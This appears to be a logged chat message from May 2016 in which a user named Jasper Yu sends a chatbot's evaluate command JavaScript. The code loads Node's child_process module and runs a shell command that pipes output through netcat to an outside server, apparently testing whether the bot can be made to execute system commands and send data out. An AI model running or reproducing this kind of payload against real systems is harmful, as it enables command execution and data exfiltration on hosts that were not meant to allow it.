Jasper Yu says to SITCON BOT Testpool/evaluate installModule("child_process", () => { var exec = require('child_process').exec; var cmd = 'echo a | nc srv.seadog007.me 12345'; exec(cmd, function(error, stdout, stderr) { console.log(stdout) }); });at Sun, May 8, 2016 4:27 PM